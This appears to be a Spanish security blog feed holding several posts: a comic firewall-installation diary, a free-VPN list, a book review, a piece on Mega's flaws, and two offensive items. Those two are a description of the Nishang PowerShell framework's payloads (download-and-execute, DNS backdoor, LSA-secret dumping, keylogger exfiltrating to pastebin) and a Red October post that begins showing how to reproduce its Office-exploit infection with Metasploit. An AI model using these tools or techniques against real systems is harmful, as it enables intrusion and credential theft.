Sucede que este firewall de nueva generación, en particular, tiene la virtud de ponerse en modo Transparente, y de esta forma puedes meterlo sin modificar ruteo, bastante conveniente. Luego, mi querido firewall iba a estar justo por debajo del otro firewall que todavía no íbamos a quitar, porque el cliente optó por verificar la integración estable de la plataforma en su red, y que no tuviera problemas identificando cualquier tipo de tráfico. Mi respuesta fue: “ok, que el cliente se sienta cómodo, se lo dejamos así una semanita, desde mi punto de vista esto únicamente va a retrasar la instalación, y no tiene caso, pero ok”…

A partir de aquí les contaré el suplicio como un sobreviviente del apocalipsis zombie…

Bitácora de la hecatombe perimetral, Instalación del Firewall Día 1

*** Por supuesto tú no usas una computadora cualquiera cómo crees?? Es imposible que tenga menos de 16 GB en RAM, ni siquiera te pase por la cabeza que no posea mínimo un doble núcleo. Lo tuyo es un "monstruo" que corre bajo Debian. Donde se te ocurra nombrar otro sistema operativo, estarán malditas 7 generaciones antes y después de toda tu descendencia/ascendencia. Y para que no quede duda, de una vez te digo que para mí eso de utilizar GÜINDOWS, no es ni triste, ni doloroso. Ser de Microsoft es de mal gusto, punto.

(La cultura del “jaker”, clase de Seguridad Informática, Enero 2008, Lo que no debes hacer si quieres ser un Gurú informático) ***

Había ido como todos los días a mi ritual sagrado de soplarme un licuado de avena con galletitas cuando…RING RING!!

Yo: Diga?
Cliente: Hola Fer cómo estás? Mira al parecer tenemos un problema con el firewall que instalaste…
Yo: Si, qué sucede?, ayer validamos todos los servicios y estaba funcionando correctamente. 

Cliente: Pues si más o menos…es que no validamos los teléfonos. La persona que administra el PBX estaba efectuando una actualización al servidor y nosotros utilizábamos celulares mientras tanto, por eso no tuvimos oportunidad de probarlo…
Yo: Bueno, existe la posibilidad, (muy alta por cierto), de que la actualización en el PBX haya afectado la comunicación con los teléfonos, por qué no revisan esa parte.
Cliente: Si nosotros también pensamos lo mismo, pero quería que nos ayudaras a revisar los logs del firewall, para descartar que sea el equipo.
Yo: Ok yo los checo, pero se me hace raro, el equipo está en modo transparente, en teoría está dejando pasar absolutamente todo.
Cliente: Si pero quizá, nos esté tirando la conexión qué se yo! Revísalo y me mandas tu reporte no?
Yo: (Si jefazo ya sabe, estoy en cuerpo y alma para usted, [y qué parte de que está en modo transparente no entiendes?? obvio está dejando pasar todo] Ok qué protocolos y puertos utiliza su PBX?.
Cliente: Mmmm creo que es SIP pero no sé más, debe verse en el firewall no?
Yo: Si…claro.

Pasé aproximadamente unas dos horas tratando de encontrar el dichoso SIP en el log del firewall, y no encontré nada de nada, apliqué filtros, revisé las configuraciones en las zonas, y nada. Al poco rato…RING RING!

Cliente: Fer pudiste checar algo? (Nótese que todavía sigo siendo “Fer”, ustedes notarán la evolución)
Yo: Mmmm no, no visualicé nada en el firewall, al parecer ni siquiera lo ve para dejarlo pasar o para droppearlo. Si está pasando a través de él??
Cliente: Pero claro que está pasando!! Te parece bien que agendemos una ventana para mañana y poder revisarlo con calma?? Es que este servicio lo tenemos que tener listo para dentro de dos días. Ahí verificamos cuál es el problema, la actualización del PBX o el firewall. Yo: (Ok, pero no me grite) Si…me parece bien (Deos meo par favar!!).

Bitácora de la hecatombe perimetral, Instalación del Firewall Día 2

*** Mi mundo empieza en el IRC. He cambiado el nombre a mi script de mIRC y todos creen que lo he programado desde cero. Además, he instalado Winlinux que sólo uso para que todos piensen que de verdad soy un lince en este mundo. Aprendí a usar el smurf; pobre de aquel que me mande un DCC. También se programar, copiando y pegando código Java que encontré por ahí; he hecho que mi página sea mucho más vistosa...

(Manifiesto del lammer, clase de Seguridad Informática, Marzo 2008, Programando Shell coding básico)***

Llegamos por ahí de la media noche para comenzar con la tortur... DIGO LAS CONFIGURACIONES. Si en ese instante, hubiera estado en Las Vegas, les juro por mi santa laptop Alienware M11 (ay si ay si!), que apostaba mi cabeza en una guillotina a que el problema no lo tenía mi firewall.

Cliente: Vamos a dar rollback de la actualización, ponemos la versión que teníamos probada y la puenteamos para que pase por el firewall. Fer dice que como no hay políticas de contención tiene que jalar.
Yo: (Fer dice, Fer dice, no puede hablarme con tanta pasión sobre un PBX a la media noche, no puede ser tan desalmado!) Si, así lo tengo configurado para que deje pasar todo (por enésima vez!).

Dos horas después de que dieran rollback a su actualización, comencé a sentir ñáñaras en… ya saben en qué lugar se sienten las ñáñaras no?? cuando dijo:

Cliente: Fer ya está en la versión que teníamos antes, conectamos los teléfonos y el PBX a través del firewall, y todavía no vemos que se aprovisionen. Supongo deshabilitaste alguna configuración, mientras estábamos regresando a la versión anterior no??
Yo: (No la verdad yo me estaba echando un coyotito) No he tocado nada, lo dejé como ha estado desde que lo instalé.
Cliente: Ah pues mejor revisa que tiene, porque entonces si es el firewall.
Yo: No existe otro salto entre el PBX y los teléfonos, algo que esté metiendo ruido??
Cliente: No, sólo un switch que baja a todos los equipos pero el switch no tiene configuración de VLANs, ni nada, está plano.
Yo: (Dios mío del Génesis Bíblico, si es el firewall y ahora qué carajos hago?) Ok déjame checarlo por favor.
Cliente: Adelante Fernando, aquí está la ventana hasta las 6 am…
Yo: (Fernando…me llamó Fer-nan-do, eso no puede ser bueno) Esperemos acabarlo antes… Cliente: Esperemos.

Qué fue lo que hice durante tres horas? Revisar el log otra vez, ver que efectivamente no pasaba el protocolo SIP del PBX, (bueno ni se veía, qué digo pasaba), verificar los archivos en raw desde la línea de comandos para ver si salía algo, un bug, un error, un April’s fool, ALGO!, habilitar la aplicación que viene de default como SIP en una política de seguridad (pero para qué hice esto si ya tenía una política que literal era: Deja pasar any desde any a any con any y any…y anything happens shit!!), ver cómo mis interfaces poleaban, conectar y desconectar el cable (0_o!) (de verdad ya andaba bien desesperado), reiniciar la caja, actualizar a una versión de sistema operativo más nueva, volver a reiniciar la caja, ponerme internamente nervioso y al borde de la implosión, borrar toda la configuración, rehacerla desde 0, ver que nada cambiaba, que sólo se agotaba el tiempo, comenzar a pensar cómo le iba a decir elegantemente que no sabía qué demonios sucedía, mirar al techo, querer salir corriendo, ir al baño a vomitar, hablarle a mi soporte técnico (no, no, eso jamás!!!), ponerme a llorar…

Humillante, ya sé. Deprimente, descorazonador. Ladies and gentlemen, directamente desde el Data Center, con ustedes: Mister Misery. Me daba cuenta a mi alrededor como el grupo de 10 ingenieros estaban esperando a que diera una señal de vida y no solamente bajara la mirada hacia el monitor de mi laptop. La verdad yo sólo veía la luz de la pantalla, y me quedé en blanco. No se me ocurría nada más. ¿Qué hacía?, literal qué?!!. Puse el equipo abierto de patas, le entraba todo, le salía todo, que más le podía abrir?? Le quitaba la tapa delantera a la caja, a ver si dejando respirar los circuitos ya podía parir el SIP a gusto?? Le soplaba como cartucho viejo de Nintendo?? Según yo ya había hecho todo. Lo peor es que los tenía a todos a mis espaldas, midiendo cada acción nueva fallida que intentara. O sea, no me iba a poner a revisar la documentación técnica del firewall enfrente de ellos, sería…ultra mega noob. Y les iba a generar mucha más desconfianza, de la que ya se veía a leguas que me tenían. Mejor les hablaba directo con la verdad. Derecha la flecha.




Back it up, you b*st*rds!

Bitácora de la hecatombe perimetral, Instalación del Firewall Día 3

***…De todos modos hay que sentirse siempre seguro, no dudar ni un instante de lo que vas a hacer. Cuando te agarra el miedo no te mueves igual. Te pones tenso, vigilas a todo el mundo a tu alrededor, enseñas tu juego. Y así no salen bien las cosas. Hay que estar relajado, y al mismo tiempo con la cara bien dura. Saber que pase lo que pase no te vas a quebrar. Y saber que no te puedes morir jamás delante de ellos. Tienes que planear algún operativo, armar alguna trampa, zafarte de manera elegante, salirte de lo más hondo. Ah! Pero eso sí, dejándoles bien claro que toda su red, aunque esté más caída que el Muro de Berlín, toda está bajo control…

(Training de implementación de Juniper Networks, Juniper Networks, Septiembre 2010, Atendiendo a los canales/clientes) ***

Que Shiva y sus cuatro brazos me amparen. Eso pensaba cuando caminé directamente hacia ese hombre, que era el jefe de Ingeniería.

No me quería morir, eso era lo que pensaba más. Ayúdame, Diosito, soy un asco de ingeniero pero no quiero morirme. Y luego un Ave María con los ojos cerrados. Y luego una respiración honda para serenarme. Siempre apretaba fuerte los párpados cuando rezaba, para ver si se hacía mientras el milagrito, que jale inesperadamente. Pero no pasó.

Yo: Estuve revisando los logs de seguridad, del tráfico, y al parecer hay un problema con la identificación de la aplicación SIP, es posible que el equipo no lo reconozca totalmente porque…
Cliente: Cómo que no reconoce el SIP?? Tenía un firewall del año 2007 y reconocía el SIP perfectamente, me estás diciendo que una tecnología que se supone es mucho más actual y más poderosa según ustedes, no puede ver un pinche protocolo de voz??
Yo: Si… lo que sucede es que el equipo basa su inspección en la identificación de aplicativos, normalmente esto conlleva que conozca el SIP correspondiente al PBX que…
Cliente: Pero ustedes hicieron un levantamiento previo!! Se debieron dar cuenta qué tipo de tráfico teníamos, y qué problemas íbamos a experimentar de entrada. De haberlo sabido mejor no compraba esa chin… el equipo, nada más me está dando puros problemas!!
Yo: Solo es cuestión de que el equipo pueda identificar el protocolo nativo a su PBX, podemos pedirle al fabricante que haga una firma especial para él y así…
Cliente: Y eso se va a poder hacer en dos días!!??, A poco??!! Y si no qué solución me vas a dar eh?!!!, Yo ya te compré el equipo y el soporte, a lo mejor no te puedo presionar con el tema de la voz porque no estaba dentro de las cláusulas, pero si no queda en 15 días la instalación, voy a empezar con las penalizaciones Fernando!!
Yo: (Otra vez Fer-nan-do [Tomando en cuenta que el fabricante tarda 10 días hábiles en contestarte, creo que mejor meto mi CV en la bolsa de trabajo de nuevo]) Si, déjame verificar en mi área qué solución le podemos dar a tu problema. No te preocupes vamos a estar encima para que quede en los tiempos acordados…

Estoy frito.

In brightest day, in blackest night, No evil shall escape my sight Let those who worship evil's might, Beware my power...Green Lantern's light! (Ayúdame Yisus Mom!!) (Imagen ROBADIGOCORTESÍA de JULIUSTEOBSERVA.com)

Llegas al otro día a tu empresa, entras y te mueres de risa de la primera estupidez que oigas. Luego te sigues riendo de todas las que vengan. La idea es que te cuelgues un letrero que diga: Soy idiota. Que se te vea en los ojos, en la risa, en los calzones. Soy un inmenso estúpido con un enorme problema, que no le puedo contar a nadie, por lo menos no de manera directa, porque se supone que me jacté de resolverlo yo solo, una cosa se compensa con la otra. Hay como una etiqueta de la estupidez. Permítame decirle una humilde idiotez: de ninguna manera, el imbécil soy yo.

¿Con qué cara le voy a decir a mi jefa cómo me fue, si no podía ni verla a los ojos?

To be continued…




nishang: usando PowerShell para pentesting

$
0
0
Nishang es un framework con una colección de scripts y payloads que te permitirá usar PowerShell para realizar diversos ataques y tareas post-exploitación durante un pentest. La versión actual 0.2.1 incluye las siguientes utilidades:
  • Base64ToString.ps1: script que decodifica una cadena en base64.
  • Wait_For_Command.ps1: Payload que peticiones a una URL esperando instrucciones y descarga y ejecuta un script powershell.
  • Browse_Accept_Applet.ps1: Payload que navega silenciosamente por una URL y acepta un aviso de ejecución de un Applet de Java.
  • Credentials.ps1: este payload abre un prompt que solicita las credenciales del usuario y no se cierra hasta que se introducen los datos.
  • DNS_TXT_Pwnage.ps1: Payload que actúa como un backdoor y es capaz de recibir comandos y scripts PowerShell mediante peticiones DNS TXT.
  • Download.ps1: Payload para descargar un fichero en el directorio temporal del usuario actual.
  • Download_Execute.ps1: Payload para descargar un ejecutable en formato texto, convertirlo de nuevo a ejecutable y ejecutarlo.
  • Enable-DuplicateToken.ps1: payload que duplica el token de acceso de lsass y lo pone en el thread del proceso actual.
  • Execute-Command-MSSQL.ps1: payload que puede ser usado para ejecutar comandos remotamente en un servidor MS SQL.
  • ExetoText.ps1: Payload para convertir un ejecutable en un fichero de texto.
  • Get-LSASecret.ps1: payload que muestra los LSA Secrets del equipo local.
  • Information_Gather.ps1: Payload que obtiene información útil del objetivo y la sube a pastebin como un post privado. La info también es visible desde la consola.
  • Invoke-Medusa.ps1: payload que ejecuta un ataque de fuerza bruta contra SQL Server, Active Directory, Web y FTP.
  • Invoke-PingSweep.ps1: payload que escanea direcciones, puertos y hosts.
  • Keylogger.ps1: este payload registra todas las teclas del usuario y las escribe en el fichero key.log dentro del directorio temporal del usuario (mala idea). Las información capturada también se pega en pastebin como un post privado.
  • Parse_Keys.ps1: script para parsear las información obtenida por el keylogger.
  • Speak.ps1: Payload que "habla" la frase que le indiques.
  • StringToBase64.ps1: script que codifica una cadena a base64.
  • TexttoExe.ps1: Payload que convierte un fichero PE en hexadecimal a ejecutable.
  • Time_Execution.ps1: Payload que espera el tiempo indicado para ejecutar un script.
Todos estos scripts y payloads son compatibles con Get-Help, es decir, utiliza "Get-Help -full" en un prompt de PowerShell para obtener el detalle de la ayuda para cada uno de ellos.

Y recuerda que para permitir la ejecución de scripts Powershell en un equipo puede que sea necesario modificar la política de ejecución:

 
PS D:\nishang_0.2.1>  Set-ExecutionPolicy Unrestricted

Cambio de directiva de ejecución
La directiva de ejecución le ayuda a protegerse de scripts en los que no confía. Si cambia dicha directiva, podría
exponerse a los riesgos de seguridad descritos en el tema de la Ayuda about_Execution_Policies en
http://go.microsoft.com/fwlink/?LinkID=135170. ¿Desea cambiar la directiva de ejecución?
[S] Sí  [N] No  [U] Suspender  [?] Ayuda (el valor predeterminado es "S"):
PS D:\nishang_0.2.1>

Mi otra crítica de Hacker Épico

$
0
0
El "malévolo" portador del fichero
Tras unos días de ausencia justificada, absorto en mi lucha contra el cigarrillo, en mi determinación inquebrantable de dejar para siempre el tabaco, vuelvo a abrazar la escritura con algo que tenía pendiente antes de que el paso del tiempo mermase mi memoria: una breve crítica de la (esperada) novela 'Hacker Épico' escrita por Alejandro Ramos y Rodrigo Yepes.

La historia del libro gira en torno a Ángel Ríos, un consultor técnico que trabaja en una empresa de seguridad informática llamada Épica. Les juro que conozco una empresa española cuyo nombre coincide si modificamos una sóla de sus letras, y un consultor llamado Ángel que se fue a dicha empresa... ¿casualidad?, quizás sea sólo un juego de palabras para el título, o quizás no... El caso es que el ficticio personaje recibe la llamada de Yolanda, su amor platónico desde el instituto, y ésta (lejos de corresponder de primeras a su amor) le presta un pendrive de Hello Kitty y el reto de obtener la clave de un misterioso archivo pdf.

Tener amigos hasta en el infierno...
No les quiero destripar la trama, pero a partir de ese momento comienza una trepidante carrera en la que se entremezclan ciertos misterios, corrupción política al más estilo Gürtel o Pokémon, (algo de) hacktivismo y hacking, mucho hacking... En definitiva, durante el transcurso de la trama podremos ver el desarrollo de los hechos avanzando a través del pensamiento científico de Ángel y el apoyo físico e incontestable de su salvador amigo Marcos. Sin duda una historia que te atrapará fácilmente y que devorarás en menos de 48 bitshoras...

¿Quién no ha estado nunca en un VIPS?
Respecto a mi opinión, he de decir que para mí no existe crítica totalmente objetiva, pues es inevitable la subjetividad del punto de vista de quien suscribe. Ahí es precisamente donde este libro me encandila, porque durante su lectura me fui encontrando continuas reseñas a sitios que en mi vida real frecuento y a personas que conozco (al menos un poco), algunos caracteres claramente figurados y algunos otros guiños. Véase por ejemplo el dominio de nuestro gran y grande amigo olascoaga.ar (ein Gruß Kollegen!) y desaliñado aspecto de Javier Etxeondo (¿de dónde habrán sacado la imagen de ese tío? xd). Por no hablar de algunas situaciones en las que seguro que muchos de vosotros os habéis sentido identificados,¿o a quien no le ha tocado en más de una ocasión figurar en unas oficinas como las de Telgroup?

Ángel jugando al apalabrados...
Si viramos al lado técnico, la puesta en escena de los casos de hacking es impecable, nada que ver con otras obras de ficción como el reciente "mediometraje" Reboot (si observas el transfondo del mensaje no es una película mala, Lorenzo...). Es por eso que conviene no dejar este libro como adorno de una colorida pero estéril estantería, pues seguro quedremos consultar más adelante el detalle de algún ejemplo de análisis forense, obtención de contraseñas por fuerza bruta, spoofing, phising, cracking de redes inalámbricas, creación de backdoors, análisis de vulnerabilidades web, etc. Y es que otrora de las excelencias de este libro es mostrarnos todas estás técnicas de pentesting desde un enfoque eminentemente práctico, algo en lo que "el melenas" (desde el cariño) es uno de los mejores sin duda.
  
Siempre se complica todo
Alex no se acordará, pero en alguna ocasión me comentó que no podía escribir un libro de pentesting porque no podría llegar a ser perfecto, y por lo tanto no merecía la pena escribir un libro más... Este libro no es perfecto, pero su imperfección le hace especial. Si hubiese sido una gran obra maestra, un libro técnico de referencia sin más, un trozo de árbol sin alma, hubiera acabado como un libro sólo de consulta y muchos de sus compradores seguramente no hubieran leído si quiera un 10% de su contenido. Al escribir un tecno-thriller tan entretenido como instructivo, muchos de nosotros ya estamos esperando impacientemente otra aventura más de Ángel, el arquetipo de antihéroe de novela negra, el hacker cercano o simplemente la persona que ama la seguridad informática y con la que nos identificamos.

Enhorabuena por el libro.


pd. ¿Y ahora qué? Pues si no tienes el libro te recomiendo que lo adquieras a través de Informática 64 (lo siento, no existe todavía versión electrónica ni se ha filtrado ninguna versión en pdf, repito FUE UNA BROMA!). Pero si ya lo tienes y quieres hablar con sus autores puedes pasarte por La Casa de Zamora en Madrid (además prometen canapés y vino de la tierra). Por otra parte, si quieres leer más libros de este género tiene buena pinta 'Counting from Zero' de Alan B. Johnston, en la que un experto de seguridad intentará salvar Internet de un ataque 0-day a través de una inmensa botnet...

25 servicios VPN gratuitos for fun and profit

$
0
0
A estas alturas todos sabemos que una red privada virtual (VPN) permite cifrar los datos de las conexiones entre dos nodos, permitiendo no sólo la navegación web (como es el caso de los llamados proxies anónimos) si no también el uso de otros protocolos para correo electrónico, mensajería instantánea, voz sobre IP (VoIP) y cualquier otro servicio de Internet.

Existen muchos servicios VPN disponibles y la mayoría se utilizan para mantener el anonimato, si bien es importante decir que esto dependerá en gran medida de la confianza que deposites en el proveedor del servicio, ya que muchos registran tus pasos y podrían facilitar los logs si las autoridades así lo requiriesen, e incluso los más legales lo advierten en la aceptación de sus políticas de uso si existe abuso. No obstante, existen algunos proveedores que sitúan sus servidores en países en los que todavía no está definida claramente una legalidad y se comprometen a no almacenar ningún registro de conexión, pero eso ya es cuestión de confianza...
 
Otro de los típicos usos que se les da a estas VPNs es la de mantener la privacidad de las comunicaciones, dado que los datos irán cifrados desde el cliente hasta el terminador de túneles, invalidando así toda probabilidad de éxito para un ataque MiTM en ese tramo... y digo en ese tramo porque evidentemente el tráfico desde el servidor del proveedor al sitio a visitar viajará sin cifrar, por lo que la seguridad en este caso no sería completa.
Sin embargo, si podríamos hablar de mayor privacidad a la hora de esconder un poco nuestra huella digital, donde cookies y otros registros se verán afectados y pondrán un poco más difícil la tarea a las plataformas de ads.

Por último y quizás la principal ventaja de las VPNs es la evasión. Primero para evitar la censura mediante geo-controles al presentarnos con la IP pública de otro país, tan útil para ver servicios web xenófobosrestrictivos como Hulu o Netflix, algo que no siempre es muy efectivo porque sobretodo las IPs de los servidores VPN más famosos son añadidos en blacklists y por tanto bloqueados. Otro uso de evasión es para los firewalls que no podrán determinar el protocolo del tráfico cifrado que atraviesa el túnel. Es decir, si un firewall permite el estableciemiento de un túnel o simplemente no puede evitarlo porque se enmascara mediante otro protocolo, es decir no tiene deep inspection, pues entonces la seguridad del perímetro queda comprometida.

Actualmente existen numerosos proveedores que ofrecen distintos servicios VPN con distintas implementaciones como IPSec, SSL/TLS, L2TPoPPTP. Algunos facilitan su propio cliente y otros permiten utilizar algún otro existente como OpenVPN. La mayoría son fáciles y transparentes de usar y poseen servicios premium de pago que aumentan sus capacidades como más velocidad y ancho de banda o mayor volumen de datos transferidos al mes. A continuación echaremos un vistazo a 25 servicios VPN que al menos ofrecen servicios gratuitos en distinta medida:

1. AceVPN

Dispone de servidores en 13 países y un servicio gratuito accesible por invitaciones. Es multiplataforma: Microsoft Windows, Apple Mac, Linux, iPhone, iPod touch, iPad, Android, etc.

2. AnchorFree Hotspot VPN

VPN para anonimizar tráfico en los Estados Unidos que ofrece la empresa Anchor Free. Válido para Windows y Mac. Algunos sitios como Hulu detectan los servidores de Anchor Free y los bloquean.

3. CyberGhost

Es un servicio gratuito de VPN de Alemania, que te ayudará a encaminar tu conexión a través de una IP alemana. El servicio gratuito está limitado a 1 GB de tráfico al mes, más que suficiente para navegar, chatear y mandar correos. El servicio de pago es también muy asequible.

4. Free VPN by WSC

Apenas agrega una latencia de 10 a 50 ms. La reproducción de streaming contra servidores británicos y estadounidenses funciona sin problemas, sin interrupciones y la reproducción es instantánea. Tiene un diseño más simple, más servidores y es menos intrusivo que Anchor Free. 

  
5. GPass 

El servicio de GPass proporciona acceso gratuito a VPNs, así como un proxy muy rápido que se puede utilizar directamente desde el navegador. El servicio es muy popular en China, donde la censura en Internet es de lo mas común.

6. Hostizzle

Servicio que te ofrece mensualmente 10mb gratis, y funciona con Hulu, por lo tanto quiere decir que tenemos IP de USA. Lo único es que cada mes es necesario renovar el certificado para la conexión. 

7.Hotspot Shield

Este es, posiblemente, el cliente VPN gratuito más popular del mundo. Se hizo popular cuando Hulu se puso en marcha. Ahora, tienen  servicios de VPN en Estados Unidos y el Reino Unido que se pueden utilizar para protegerse de los fisgones WiFi, robos de identidad y censuras. Lo mejor de Hotspot Shield es que proporciona ancho de banda ilimitado y funciona tanto en PC como Mac.

8.It's hidden

Utiliza cifrado de 128 bits para securizar el tunel hacia sus servidores. Con sede en Holanda, se aprovecha del clima legal de allí y no guarda ningún log ni registro de actividad.


9. JAP VPN

JAP (llamado también JonDo) está escrito en java y por lo tanto es multiplataforma. Utiliza una secuencia de servidores intermediarios para garantizar la privacidad y el anonimato.


10. MacroVPN 

Después del registro, se tiene 4 direcciones de servidor VPN para elegir. Uno de Italia, y los otros tres de EE.UU., se debe elegir uno y crear una nueva conexión VPN, entonces se puede obtener acceso al servicio de MacroVPN con el nombre de usuario y contraseña elegidos.

11. OkayFreedom

Servicio que ofrece gratuitamente 500 mb más 100 mb adicionales por recomendación (hasta 1gb). Puedes seleccionar manualmente el país de los servidores, actualmente Alemania, Suiza, Gran Bretaña o EE.UU.
 

12. OpenVPN

Es una VPN mediante SSL/TLS que proporciona alta seguridad y privacidad. La mayor diferencia entre VPN PPTP y OpenVPN es que necesita instalar el software cliente de OpenVPN para usar el servicio. No trabaja con dispositivos móviles como iPhone, iPad, Windows Mobile y Android. Pero OpenVPN funciona en Windows, Mac y Linux .

13. PacketiX.NET

Es un servicio de VPN japonés. En realidad, es un servicio premium, pero tienen un servicio de prueba de línea de uso gratuito. El servicio es rápido y fiable y también es fácil de usar. Sólo tienes que descargar el administrador de conexión VPN, instalar y conectar. Funciona en Windows y Linux.

14. proXPN

No tiene límite de volumen de datos, pero su limitación llega por el lado de la velocidad: su pico máximo es de 300 kilobits por segundo para las cuentas sin coste. Dispone de servicios OpenVPN y PPTP y tiene versiones para Windows, Mac, iOS y Android.


15. RaptorVPN 

Proporciona una conexión VPN con su propio cliente VPN o con el que el usuario elija. Ofrece conexiones VPN en los protocolos VPN PPTP (Point-to-Point Tunneling) y L2TP (Layer 2 Tunneling), no sólo para cifrar la comunicación, sino también aplicar técnicas efectivas de integridad de datos. Recientemente ha pasado a formar parte de Spotflux.

16. RealVPN

Utiliza OpenVPN y está también disponilble para smartphones. En su web tienen una política de aceptación de uso ("AUP") y avisan claramente que si no se cumple la cuenta puede ser suspendida e incluso tomar las acciones legales pertinentes.


17. Spotflux

Una de las principales características es su sencillez, su interfaz principal solo contiene un par de botones. No requiere de mucho una vez instalado: solo ejecuta, presiona un botón y olvídate de él. Cifra y asegura tu conexión. Ideal para navegar por redes públicas. Si requieres configurar un proxy, el programa te permitirá hacerlo sin ningún problema. Quizá su única desventaja sea la velocidad.

18. SecurityKiss

Es un servicio de túnel que garantiza la seguridad y la privacidad de sus datos una vez que salen de tu ordenador. Se vuelve a dirigir todo el tráfico a través de un túnel impenetrable a una pasarela de seguridad. Toda la comunicación en el túnel es cifrada.

19. Shield Exchange

Un servicio de VPN que te permite crear un cuenta Trial o Free en la cual te dan 100MB de navegacion gratuita anual, por lo tanto y dada esta limitación es un servicio que se puede utilizar en casos de emergencia o que las otras alternativas te fallen.

20. TorVPN

Es uno de los últimos en entrar al mercado de las VPNs. TorVPN es bueno para pasar por los estrictos filtros de contenido, navegar por la web de manera anónima, para asegurar su comunicación VoIP o el acceso remoto al trabajo desde tu casa/oficina. Con TorVPN puedes conseguir un servidor OpenVPN, acceso SSH, PPTP y Proxy TOR. El acceso gratis a la VPN se limita a 1 GB por mes y funciona en Windows, Mac, iPhone y iPad.
 

Es probablemente uno de los servicios VPN más fáciles de usar. TunnelBear te dará acceso a sitios geo-restringidos. Si registras una cuenta gratuita dispondrás de 500 mb al mes,  aunque puedes elevar esa cifra a 1 gb simplemente asociando tu cuenta de Twitter.

22. UltraVPN

Es un cliente de VPN francés que oculta la conexión y permite el uso de aplicaciones bloqueadas. También se basa en el servicio OpenVPN. El tráfico es ilimitado. El ancho de banda es de hasta 500 Kb/s, dependiendo de las condiciones de la red.

23. USA IP

Para la versión gratuita no es necesario registrarse, basta con descargar el archivo USAIP.pbk, hacer doble clic en el archivo y seleccionar una de las conexiones PPTP. Después podrás acceder a los servicios gratuitos con el nombre de usuario demo y contraseña demo. Pero es necesario volver a conectar la red IP USA cada 7 minutos....
 
24.VPNBook
 
Túnel PPTP que soporta Microsoft Windows, Linux, Apple, móviles y PS3, que además ofrece la posibilidad de usar OpenVPN si tu ISP o gobierno bloquea el protocolo.

25. Your-Freedom

Hace accesible lo inaccesible y oculta su dirección de red. El servicio gratuito le permite utilizarlo durante 6 horas al día (durante 15 horas a la semana). Puedes descargar el software o usarlo en modo OpenVPN. Es compatible con plataformas Windows, Mac y Linux.

Fuentes:
http://en.flossmanuals.net/bypassing-es/servicios-vpn/   
http://www.neoteo.com/proxpn-vpn-gratuito-sin-limite-de-transferencia
http://techpp.com/2009/07/09/top-5-free-vpn-clients/
http://elinformatico.eu/9-servicios-vpn-gratuitos-20120210
http://bandaancha.eu/foros/lista-vpn-gratuitos-streaming-1655936
http://walhez.com/2012/07/top-10-servicios-vpn-gratis/
http://www.nicearma.com/2011/08/05/vpn-gratis/
http://latingeek.net/2012/07/30/cuales-son-las-alternativas-para-servicios-de-vpn-gratuitos/
http://www.pcmag.com/article2/0,2817,2408596,00.asp

Mega: primeros fallos de seguridad

$
0
0
Como muchos sabréis, el nuevo portal de descargas Mega, el sucesor de MegaUpload, se publicó el pasado domingo. En esta ocasión Kim Schmitz (alias Kim Dotcom) ha querido protegerse de la violación de derechos de autor utilizando un sistema que cifra los datos de usuario antes de que llegen a los servidores de Mega y mediante claves que sólo tienen los propios usuarios, es decir, su empresa no se hace responsable de los contenidos que alojan porque supuestamente los desconocen. Es lo que se denomina un servicio para compartir en la nube con cifrado en la parte del cliente, y ya se hizo en menor escala en otros sitios como securesha.re.

Esto evidentemente ha levantado ciertas suspicacias. Si a esto además le añadimos la polémica y la fama que preceden a este nuevo portal y sus pretensiones de gran seguridad mediante el uso de cifrado 128-bit AES y una infraestructura de clave asimétrica (2048-bit RSA), tenemos a Mega avocado a estar en el centro del huracán desde su nacimiento, algo por cierto no tan malo si tenemos en cuenta que su versión Beta cuenta desde su inicio con un ejército de Beta-testers. Y los resultados no se han hecho esperar...

En seguida se detectó un XSS en el portal y un problema (desmentido) con la generación aleatoria de números al crear claves. Además, muchos expertos en seguridad coinciden que el uso del navegador para cifrar la información abre vías de ataque como la obtención de las claves para romper SSL
(el uso de métodos criptográficos en javascript se considera "peligroso") o el uso de comandos contra los servidores de Mega, muchos de ellos alojados en los Estados Unidos.

Por último, recientemente un investigador ha publicado una herramienta denominada MegaCracker capaz de romper las contraseñas "hasheadas" que se envian a los usuarios dentro del correo de confirmación al crear una nueva cuenta. Es decir, si se intercepta ese correo, es posible obtener fácilmente la contraseña del usuario de Mega, una contraseña que se utiliza para cifrar la clave AES y de momento no es posible cambiar...

"OP Octubre Rojo"... tomando el control mediante archivos adjuntos

$
0
0
El malware fue distribuido por más de medio mundo
Hace poco, Kaspersky publicó el descubrimiento de un malware dirigido a las "altas esferas" que pasó desapercibido durante mucho tiempo y parece haber sido programado por especialistas con intereses muy concretos. Surge la inmediata comparación con Flame, aunque todo apunta a que no llega a ese nivel de sofisticación. Su trama se ha llamado "Operación Octubre Rojo". 

Tras ojear la noticia me he puesto manos a la obra y hemos investigado un poco más sobre el alcance de este malware y su método de infección, el cual parece bastante eficaz. Según el mapa publicado por Kaspersky, buena parte de Europa, Asia e incluso África se ha visto afectada...

El método de infección:
Ejemplo de correo distribuyendo el malware

Esta es la parte más "curiosa". El principal método de infección es la distribución de ficheros adjuntos por email aprovechando vulnerabilidades en Office CVE-2009-3129 (Excel), CVE-2010-3333 y CVE-2012-0158 (ambas de Word). 

Vamos hacer un parón en este punto pues esta bien saber hacer de todo y si ha sido simple pero eficaz para "Operación Octubre Rojo" quien sabe algún día nos puede ser de utilidad a nosotros ;D

Los atacantes tomaron unos documentos previamente creados por una campaña de infección china, modificaron el payload y los enviaron a sus 
víctimas. El texto de los documentos no fue personalizado. Sin embargo, 
los diplomáticos, embajadores y víctima en general quedaron infectados.

Veamos como podemos aprovechar estos exploits en casita y sin sudar demasiado...imitando así el método de infección ..


CVE-2012-0158

Ya se hablo algo de ella aquí en Hackplayers.
Todo empieza cuando el Word abre el documento previamente mandado por email... La vulnerabilidad CVE-2012-0158 es explotada y el shellcode del archivose desencadena.

Este shellcode es responsable de instalar o ejecutar un payload en el sistema operativo.

En esta etapa, el mismo shellcode inicia un nuevo proceso en Word y abre el documento-trampa, que también se coloca en el directorio Temp. El primer proceso se finaliza y la víctima sigue viendo sólo el documento aparentemente legítimo.

Vamos a la práctica:


El siguiente paso es fácil de adivinar... e indicaremosen Metasploit las opciones como mejor nos convenga, Para según que casos en el ejemplo usaré las siguientes (en principio iba a omitir este paso, pero por si llega algún recién nacido lo explicamos bien desmenuzadito):



Para usar las otras dos vulnerabilidades más de lo mismo...

CVE-2010-3333

